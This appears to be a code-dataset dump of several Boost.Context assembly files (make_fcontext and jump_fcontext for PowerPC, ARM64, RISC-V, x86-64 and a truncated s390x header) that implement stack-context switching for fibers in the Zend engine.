repo_id
stringlengths 5
115
| size
int64 590
5.01M
| file_path
stringlengths 4
212
| content
stringlengths 590
5.01M
|
|---|---|---|---|
Aidam7/PHavirP
| 5,227
|
Zend/asm/make_ppc32_sysv_elf_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* |bchai|hiddn| fpscr | PC | CR | R14 | R15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R16 | R17 | R18 | R19 | R20 | R21 | R22 | R23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R24 | R25 | R26 | R27 | R28 | R29 | R30 | R31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------|------------ *
* | 224 | 228 | 232 | 236 | 240 | 244 | *
* ------------------------|------------ *
* | F30 | F31 |bchai| LR | *
* ------------------------|------------ *
* *
*******************************************************/
.file "make_ppc32_sysv_elf_gas.S"
.text
.globl make_fcontext
.align 2
.type make_fcontext,@function
make_fcontext:
# save return address into R6
mflr %r6
# first arg of make_fcontext() == top address of context-function
# shift address in R3 to lower 16 byte boundary
clrrwi %r3, %r3, 4
# reserve space on context-stack, including 16 bytes of linkage
# and parameter area + 240 bytes of context-data (R1 % 16 == 0)
subi %r3, %r3, 16 + 240
# third arg of make_fcontext() == address of context-function
#ifdef __linux__
# save context-function as PC
stw %r5, 16(%r3)
#else
# save context-function for trampoline
stw %r5, 248(%r3)
#endif
# set back-chain to zero
li %r0, 0
stw %r0, 240(%r3)
# copy FPSCR to new context
mffs %f0
stfd %f0, 8(%r3)
#ifdef __linux__
# set hidden pointer for returning transfer_t
la %r0, 248(%r3)
stw %r0, 4(%r3)
#endif
# load address of label 1 into R4
bl 1f
1: mflr %r4
#ifndef __linux__
# compute abs address of trampoline, use as PC
addi %r7, %r4, trampoline - 1b
stw %r7, 16(%r3)
#endif
# compute abs address of label finish
addi %r4, %r4, finish - 1b
# save address of finish as return-address for context-function
# will be entered after context-function returns
stw %r4, 244(%r3)
# restore return address from R6
mtlr %r6
blr # return pointer to context-data
#ifndef __linux__
trampoline:
# On systems other than Linux, jump_fcontext is returning the
# transfer_t in R3:R4, but we need to pass transfer_t * R3 to
# our context-function.
lwz %r0, 8(%r1) # address of context-function
mtctr %r0
stw %r3, 8(%r1)
stw %r4, 12(%r1)
la %r3, 8(%r1) # address of transfer_t
bctr
#endif
finish:
# Use the secure PLT for _exit(0). If we use the insecure BSS PLT
# here, then the linker may use the insecure BSS PLT even if the
# C++ compiler wanted the secure PLT.
# set R30 for secure PLT, large model
bl 2f
2: mflr %r30
addis %r30, %r30, .Ltoc - 2b@ha
addi %r30, %r30, .Ltoc - 2b@l
# call _exit(0) with special addend 0x8000 for large model
li %r3, 0
bl _exit + 0x8000@plt
.size make_fcontext, .-make_fcontext
/* Provide the GOT pointer for secure PLT, large model. */
.section .got2,"aw"
.Ltoc = . + 0x8000
/* Mark that we don't need executable stack. */
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 3,716
|
Zend/asm/make_arm64_aapcs_elf_gas.S
|
/*
Copyright Edward Nevill + Oliver Kowalke 2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | d8 | d9 | d10 | d11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | d12 | d13 | d14 | d15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | x19 | x20 | x21 | x22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | x23 | x24 | x25 | x26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | x27 | x28 | FP | LR | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | | | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| | | *
* ------------------------------------------------- *
* | PC | align | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_arm64_aapcs_elf_gas.S"
.text
.align 2
.global make_fcontext
.type make_fcontext, %function
make_fcontext:
# shift address in x0 (allocated stack) to lower 16 byte boundary
and x0, x0, ~0xF
# reserve space for context-data on context-stack
sub x0, x0, #0xb0
# third arg of make_fcontext() == address of context-function
# store address as a PC to jump in
str x2, [x0, #0xa0]
# save address of finish as return-address for context-function
# will be entered after context-function returns (LR register)
adr x1, finish
str x1, [x0, #0x98]
ret x30 // return pointer to context-data (x0)
finish:
# exit code is zero
mov x0, #0
# exit application
bl _exit
.size make_fcontext,.-make_fcontext
# Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 4,090
|
Zend/asm/jump_arm64_aapcs_macho_gas.S
|
/*
Copyright Edward Nevill + Oliver Kowalke 2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | d8 | d9 | d10 | d11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | d12 | d13 | d14 | d15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | x19 | x20 | x21 | x22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | x23 | x24 | x25 | x26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | x27 | x28 | FP | LR | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | | | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| | | *
* ------------------------------------------------- *
* | PC | align | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.text
.globl _jump_fcontext
.balign 16
_jump_fcontext:
; prepare stack for GP + FPU
sub sp, sp, #0xb0
; save d8 - d15
stp d8, d9, [sp, #0x00]
stp d10, d11, [sp, #0x10]
stp d12, d13, [sp, #0x20]
stp d14, d15, [sp, #0x30]
; save x19-x30
stp x19, x20, [sp, #0x40]
stp x21, x22, [sp, #0x50]
stp x23, x24, [sp, #0x60]
stp x25, x26, [sp, #0x70]
stp x27, x28, [sp, #0x80]
stp fp, lr, [sp, #0x90]
; save LR as PC
str lr, [sp, #0xa0]
; store RSP (pointing to context-data) in X0
mov x4, sp
; restore RSP (pointing to context-data) from X1
mov sp, x0
; load d8 - d15
ldp d8, d9, [sp, #0x00]
ldp d10, d11, [sp, #0x10]
ldp d12, d13, [sp, #0x20]
ldp d14, d15, [sp, #0x30]
; load x19-x30
ldp x19, x20, [sp, #0x40]
ldp x21, x22, [sp, #0x50]
ldp x23, x24, [sp, #0x60]
ldp x25, x26, [sp, #0x70]
ldp x27, x28, [sp, #0x80]
ldp fp, lr, [sp, #0x90]
; return transfer_t from jump
; pass transfer_t as first arg in context function
; X0 == FCTX, X1 == DATA
mov x0, x4
; load pc
ldr x4, [sp, #0xa0]
; restore stack from GP + FPU
add sp, sp, #0xb0
ret x4
|
Aidam7/PHavirP
| 4,275
|
Zend/asm/jump_arm64_aapcs_elf_gas.S
|
/*
Copyright Edward Nevill + Oliver Kowalke 2015
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | d8 | d9 | d10 | d11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | d12 | d13 | d14 | d15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | x19 | x20 | x21 | x22 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | x23 | x24 | x25 | x26 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | x27 | x28 | FP | LR | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | | | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| | | *
* ------------------------------------------------- *
* | PC | align | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_arm64_aapcs_elf_gas.S"
.text
.align 2
.global jump_fcontext
.type jump_fcontext, %function
jump_fcontext:
# prepare stack for GP + FPU
sub sp, sp, #0xb0
# save d8 - d15
stp d8, d9, [sp, #0x00]
stp d10, d11, [sp, #0x10]
stp d12, d13, [sp, #0x20]
stp d14, d15, [sp, #0x30]
# save x19-x30
stp x19, x20, [sp, #0x40]
stp x21, x22, [sp, #0x50]
stp x23, x24, [sp, #0x60]
stp x25, x26, [sp, #0x70]
stp x27, x28, [sp, #0x80]
stp x29, x30, [sp, #0x90]
# save LR as PC
str x30, [sp, #0xa0]
# store RSP (pointing to context-data) in X0
mov x4, sp
# restore RSP (pointing to context-data) from X1
mov sp, x0
# load d8 - d15
ldp d8, d9, [sp, #0x00]
ldp d10, d11, [sp, #0x10]
ldp d12, d13, [sp, #0x20]
ldp d14, d15, [sp, #0x30]
# load x19-x30
ldp x19, x20, [sp, #0x40]
ldp x21, x22, [sp, #0x50]
ldp x23, x24, [sp, #0x60]
ldp x25, x26, [sp, #0x70]
ldp x27, x28, [sp, #0x80]
ldp x29, x30, [sp, #0x90]
# return transfer_t from jump
# pass transfer_t as first arg in context function
# X0 == FCTX, X1 == DATA
mov x0, x4
# load pc
ldr x4, [sp, #0xa0]
# restore stack from GP + FPU
add sp, sp, #0xb0
ret x4
.size jump_fcontext,.-jump_fcontext
# Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 5,103
|
Zend/asm/jump_riscv64_sysv_elf_gas.S
|
/*
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10| 0x14| 0x18| 0x1c| *
* ------------------------------------------------- *
* | fs0 | fs1 | fs2 | fs3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 0x20| 0x24| 0x28| 0x2c| 0x30| 0x34| 0x38| 0x3c| *
* ------------------------------------------------- *
* | fs4 | fs5 | fs6 | fs7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 0x40| 0x44| 0x48| 0x4c| 0x50| 0x54| 0x58| 0x5c| *
* ------------------------------------------------- *
* | fs8 | fs9 | fs10 | fs11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 0x60| 0x64| 0x68| 0x6c| 0x70| 0x74| 0x78| 0x7c| *
* ------------------------------------------------- *
* | s0 | s1 | s2 | s3 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 0x80| 0x84| 0x88| 0x8c| 0x90| 0x94| 0x98| 0x9c| *
* ------------------------------------------------- *
* | s4 | s5 | s6 | s7 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 0xa0| 0xa4| 0xa8| 0xac| 0xb0| 0xb4| 0xb8| 0xbc| *
* ------------------------------------------------- *
* | s8 | s9 | s10 | s11 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | | | | | *
* ------------------------------------------------- *
* | 0xc0| 0xc4| 0xc8| 0xcc| | | | | *
* ------------------------------------------------- *
* | ra | pc | | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_riscv64_sysv_elf_gas.S"
.text
.align 1
.global jump_fcontext
.type jump_fcontext, %function
jump_fcontext:
# prepare stack for GP + FPU
addi sp, sp, -0xd0
# save fs0 - fs11
fsd fs0, 0x00(sp)
fsd fs1, 0x08(sp)
fsd fs2, 0x10(sp)
fsd fs3, 0x18(sp)
fsd fs4, 0x20(sp)
fsd fs5, 0x28(sp)
fsd fs6, 0x30(sp)
fsd fs7, 0x38(sp)
fsd fs8, 0x40(sp)
fsd fs9, 0x48(sp)
fsd fs10, 0x50(sp)
fsd fs11, 0x58(sp)
# save s0-s11, ra
sd s0, 0x60(sp)
sd s1, 0x68(sp)
sd s2, 0x70(sp)
sd s3, 0x78(sp)
sd s4, 0x80(sp)
sd s5, 0x88(sp)
sd s6, 0x90(sp)
sd s7, 0x98(sp)
sd s8, 0xa0(sp)
sd s9, 0xa8(sp)
sd s10, 0xb0(sp)
sd s11, 0xb8(sp)
sd ra, 0xc0(sp)
# save RA as PC
sd ra, 0xc8(sp)
# store SP (pointing to context-data) in A2
mv a2, sp
# restore SP (pointing to context-data) from A0
mv sp, a0
# load fs0 - fs11
fld fs0, 0x00(sp)
fld fs1, 0x08(sp)
fld fs2, 0x10(sp)
fld fs3, 0x18(sp)
fld fs4, 0x20(sp)
fld fs5, 0x28(sp)
fld fs6, 0x30(sp)
fld fs7, 0x38(sp)
fld fs8, 0x40(sp)
fld fs9, 0x48(sp)
fld fs10, 0x50(sp)
fld fs11, 0x58(sp)
# load s0-s11,ra
ld s0, 0x60(sp)
ld s1, 0x68(sp)
ld s2, 0x70(sp)
ld s3, 0x78(sp)
ld s4, 0x80(sp)
ld s5, 0x88(sp)
ld s6, 0x90(sp)
ld s7, 0x98(sp)
ld s8, 0xa0(sp)
ld s9, 0xa8(sp)
ld s10, 0xb0(sp)
ld s11, 0xb8(sp)
ld ra, 0xc0(sp)
# return transfer_t from jump
# pass transfer_t as first arg in context function
# a0 == FCTX, a1 == DATA
mv a0, a2
# load pc
ld a2, 0xc8(sp)
# restore stack from GP + FPU
addi sp, sp, 0xd0
jr a2
.size jump_fcontext,.-jump_fcontext
# Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Aidam7/PHavirP
| 6,030
|
Zend/asm/jump_ppc64_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* | TOC | R14 | R15 | R16 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R17 | R18 | R19 | R20 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R21 | R22 | R23 | R24 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | R25 | R26 | R27 | R28 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | R29 | R30 | R31 | hidden | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | CR | LR | PC | back-chain| *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | cr saved | lr saved | compiler | linker | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | TOC saved | FCTX | DATA | | *
* ------------------------------------------------- *
* *
*******************************************************/
.file "jump_ppc64_sysv_xcoff_gas.S"
.toc
.csect .text[PR], 5
.align 2
.globl jump_fcontext[DS]
.globl .jump_fcontext
.csect jump_fcontext[DS], 3
jump_fcontext:
.llong .jump_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
.jump_fcontext:
# reserve space on stack
subi 1, 1, 184
std 2, 0(1) # save TOC
std 14, 8(1) # save R14
std 15, 16(1) # save R15
std 16, 24(1) # save R16
std 17, 32(1) # save R17
std 18, 40(1) # save R18
std 19, 48(1) # save R19
std 20, 56(1) # save R20
std 21, 64(1) # save R21
std 22, 72(1) # save R22
std 23, 80(1) # save R23
std 24, 88(1) # save R24
std 25, 96(1) # save R25
std 26, 104(1) # save R26
std 27, 112(1) # save R27
std 28, 120(1) # save R28
std 29, 128(1) # save R29
std 30, 136(1) # save R30
std 31, 144(1) # save R31
std 3, 152(1) # save hidden
# save CR
mfcr 0
std 0, 160(1)
# save LR
mflr 0
std 0, 168(1)
# save LR as PC
std 0, 176(1)
# store RSP (pointing to context-data) in R6
mr 6, 1
# restore RSP (pointing to context-data) from R4
mr 1, 4
ld 2, 0(1) # restore TOC
ld 14, 8(1) # restore R14
ld 15, 16(1) # restore R15
ld 16, 24(1) # restore R16
ld 17, 32(1) # restore R17
ld 18, 40(1) # restore R18
ld 19, 48(1) # restore R19
ld 20, 56(1) # restore R20
ld 21, 64(1) # restore R21
ld 22, 72(1) # restore R22
ld 23, 80(1) # restore R23
ld 24, 88(1) # restore R24
ld 25, 96(1) # restore R25
ld 26, 104(1) # restore R26
ld 27, 112(1) # restore R27
ld 28, 120(1) # restore R28
ld 29, 128(1) # restore R29
ld 30, 136(1) # restore R30
ld 31, 144(1) # restore R31
ld 3, 152(1) # restore hidden
# restore CR
ld 0, 160(1)
mtcr 0
# restore LR
ld 0, 168(1)
mtlr 0
# load PC
ld 0, 176(1)
# restore CTR
mtctr 0
# adjust stack
addi 1, 1, 184
# zero in r3 indicates first jump to context-function
cmpdi 3, 0
beq use_entry_arg
# return transfer_t
std 6, 0(3)
std 5, 8(3)
# jump to context
bctr
use_entry_arg:
# copy transfer_t into transfer_fn arg registers
mr 3, 6
mr 4, 5
# jump to context
bctr
|
Aidam7/PHavirP
| 3,231
|
Zend/asm/make_x86_64_sysv_macho_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/****************************************************************************************
* *
* ---------------------------------------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ---------------------------------------------------------------------------------- *
* | 0x0 | 0x4 | 0x8 | 0xc | 0x10 | 0x14 | 0x18 | 0x1c | *
* ---------------------------------------------------------------------------------- *
* | fc_mxcsr|fc_x87_cw| R12 | R13 | R14 | *
* ---------------------------------------------------------------------------------- *
* ---------------------------------------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ---------------------------------------------------------------------------------- *
* | 0x20 | 0x24 | 0x28 | 0x2c | 0x30 | 0x34 | 0x38 | 0x3c | *
* ---------------------------------------------------------------------------------- *
* | R15 | RBX | RBP | RIP | *
* ---------------------------------------------------------------------------------- *
* *
****************************************************************************************/
.text
.globl _make_fcontext
.align 8
_make_fcontext:
/* first arg of make_fcontext() == top of context-stack */
movq %rdi, %rax
/* shift address in RAX to lower 16 byte boundary */
andq $-16, %rax
/* reserve space for context-data on context-stack */
/* on context-function entry: (RSP -0x8) % 16 == 0 */
leaq -0x40(%rax), %rax
/* third arg of make_fcontext() == address of context-function */
/* stored in RBX */
movq %rdx, 0x28(%rax)
/* save MMX control- and status-word */
stmxcsr (%rax)
/* save x87 control-word */
fnstcw 0x4(%rax)
/* compute abs address of label trampoline */
leaq trampoline(%rip), %rcx
/* save address of trampoline as return-address for context-function */
/* will be entered after calling jump_fcontext() first time */
movq %rcx, 0x38(%rax)
/* compute abs address of label finish */
leaq finish(%rip), %rcx
/* save address of finish as return-address for context-function */
/* will be entered after context-function returns */
movq %rcx, 0x30(%rax)
ret /* return pointer to context-data */
trampoline:
/* store return address on stack */
/* fix stack alignment */
push %rbp
/* jump to context-function */
jmp *%rbx
finish:
/* exit code is zero */
xorq %rdi, %rdi
/* exit application */
call __exit
hlt
|
Aidam7/PHavirP
| 4,655
|
Zend/asm/make_ppc32_sysv_xcoff_gas.S
|
/*
Copyright Oliver Kowalke 2009.
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE_1_0.txt or copy at
http://www.boost.org/LICENSE_1_0.txt)
*/
/*******************************************************
* *
* ------------------------------------------------- *
* | 0 | 4 | 8 | 12 | 16 | 20 | 24 | 28 | *
* ------------------------------------------------- *
* |bchai| CR | LR |compl| link| TOC | R14 | R15 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 32 | 36 | 40 | 44 | 48 | 52 | 56 | 60 | *
* ------------------------------------------------- *
* | R16 | R17 | R18 | R19 | R20 | R21 | R22 | R23 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 64 | 68 | 72 | 76 | 80 | 84 | 88 | 92 | *
* ------------------------------------------------- *
* | R24 | R25 | R26 | R27 | R28 | R29 | R30 | R31 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 96 | 100 | 104 | 108 | 112 | 116 | 120 | 124 | *
* ------------------------------------------------- *
* | F14 | F15 | F16 | F17 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 128 | 132 | 136 | 140 | 144 | 148 | 152 | 156 | *
* ------------------------------------------------- *
* | F18 | F19 | F20 | F21 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 160 | 164 | 168 | 172 | 176 | 180 | 184 | 188 | *
* ------------------------------------------------- *
* | F22 | F23 | F24 | F25 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 192 | 196 | 200 | 204 | 208 | 212 | 216 | 220 | *
* ------------------------------------------------- *
* | F26 | F27 | F28 | F29 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 224 | 228 | 232 | 236 | 240 | 244 | 248 | 252 | *
* ------------------------------------------------- *
* | F30 | F31 | PC |hiddn| fpscr | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 256 | 260 | 264 | 268 | 272 | 276 | 280 | 284 | *
* ------------------------------------------------- *
* |bchai|savLR|savLR|compl| link|svTOC| FCTX| DATA| *
* ------------------------------------------------- *
* *
*******************************************************/
.file "make_ppc32_sysv_xcoff_xas.S"
.toc
.csect .text[PR]
.align 2
.globl make_fcontext[DS]
.globl .make_fcontext
.csect make_fcontext[DS]
make_fcontext:
.long .make_fcontext[PR], TOC[tc0], 0
.csect .text[PR], 5
.make_fcontext:
# save return address into R6
mflr 6
# first arg of make_fcontext() == top address of context-function
# shift address in R3 to lower 16 byte boundary
clrrwi 3, 3, 4
# reserve space for context-data on context-stack
# including 32 byte of linkage + parameter area (R1 % 16 == 0)
subi 3, 3, 288
# third arg of make_fcontext() == address of context-function descriptor
lwz 4, 0(5)
stw 4, 240(3)
# save TOC of context-function
lwz 4, 4(5)
stw 4, 20(3)
# set back-chain to zero
li 0, 0
stw 0, 256(3)
# zero in r3 indicates first jump to context-function
std 0, 244(3)
# load LR
mflr 0
# jump to label 1
bl .Label
.Label:
# load LR into R4
mflr 4
# compute abs address of label .L_finish
addi 4, 4, .L_finish - .Label
# restore LR
mtlr 0
# save address of finish as return-address for context-function
# will be entered after context-function returns
stw 4, 8(3)
# restore return address from R6
mtlr 6
blr # return pointer to context-data
.L_finish:
# save return address into R0
mflr 0
# save return address on stack, set up stack frame
stw 0, 4(1)
# allocate stack space, R1 % 16 == 0
stwu 1, -16(1)
# exit code is zero
li 3, 0
# exit application
bl ._exit
nop
|
Aidam7/PHavirP
| 5,249
|
Zend/asm/jump_s390x_sysv_elf_gas.S
|
/*******************************************************
* ------------------------------------------------- *
* | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | *
* ------------------------------------------------- *
* | 0 | 8 | 16 | 24 | *
* ------------------------------------------------- *
* | t.fctx | t.data | r2 | r6 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | *
* ------------------------------------------------- *
* | 32 | 40 | 48 | 56 | *
* ------------------------------------------------- *
* | r7 | r8 | r9 | r10 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
* | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | *
* ------------------------------------------------- *
* | 64 | 72 | 80 | 88 | *
* ------------------------------------------------- *
* | r11 | r12 | r13 | r14 | *
* ------------------------------------------------- *
* ------------------------------------------------- *
